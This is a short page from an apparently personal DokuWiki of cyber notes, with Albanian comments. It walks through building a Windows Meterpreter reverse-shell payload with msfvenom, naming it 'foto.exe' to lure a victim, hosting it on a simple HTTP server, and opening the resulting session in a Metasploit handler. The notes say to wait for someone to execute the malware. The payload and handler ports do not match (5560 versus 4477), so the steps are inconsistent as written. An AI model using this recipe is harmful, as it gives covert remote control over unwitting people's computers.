User Tools

Site Tools


cyberdocs:msfvenom_msfconsole_take_session
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80  

msfconsole
msf > use exploit/multi/handler 
msf exploit(multi/handler) > show options

msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 4477
msf exploit(multi/handler) > exploit
pret deri sa te executon dikush malware, ne kete rast te hostuar ne http
pasi te executohet malware vjen sessioni
sessions
sessions  -i 5  --numrin e sesionit
cyberdocs/msfvenom_msfconsole_take_session.txt · Last modified: 2019/02/06 12:54 by dardan

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki